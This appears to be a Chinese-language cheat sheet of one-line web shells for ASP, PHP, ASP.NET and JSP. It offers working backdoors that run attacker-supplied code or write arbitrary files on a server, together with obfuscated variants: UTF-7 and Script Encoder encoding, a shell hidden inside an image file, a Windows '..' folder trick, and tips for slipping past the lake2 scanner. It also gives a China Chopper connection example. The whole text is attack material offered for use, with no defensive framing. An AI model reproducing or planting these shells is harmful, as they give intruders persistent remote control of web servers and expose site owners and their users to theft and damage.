ASP+PHP+ASP.NET+JSP各种变形一句话大集结

ASP版:

<%execute request("#")%>

<%execute request(chr(35))%>



<%ExecuteGlobal request(chr(35))%>

<%eval request("#")%>

上面的是正常的SHELL，下面是变形的，

数据库里插入
┼攠數畣整爠煥敵瑳∨∣┩愾

utf-7的马
<%@ codepage=65000%>
<% response.Charset="936″%>
<%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

用include包含一个图片,图片最好是通过copy /b a.jpg+b.asp+c.jpg d.jpg生成出来的
要绕过lake2的话，用几个变量加常量的方法定义图片名再包含就可以了

<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1″)
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>

Script Encoder 加密
<%@ LANGUAGE = VBScript.Encode %>
<%#@~^PgAAAA==r6P. ;!+/D`14Dv&X#*@!@*ErPPD4+ P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb*oBMAAA==^#~@%>

另类的，利用windows的目录漏洞,建立..目录里面放一句话，
Set fso=Server.CreateObject("Scripting.FileSystemObject")
path=server.mappath("/")
Set f = fso.CreateFolder(path&"index..")
Set a = fso.CreateTextFile(path&"index..1.asp", True)
a.WriteLine""

<" CODEPAGE="65001"%>
<%
var lcx = {'名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : '请叫我一声老大'};
lcx.性别((lcx.名字)+'');
%>

用冰狐就行了

PHP版:

@preg_replace("/[email]/e",$_POST['h'],"error"); 
?> 
菜刀连接：http://xx.com/shell.php?h=@eval($_POST[c]); 密码:c

 

 

ASP.NET版:

<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["xlb"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

JSP版:
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>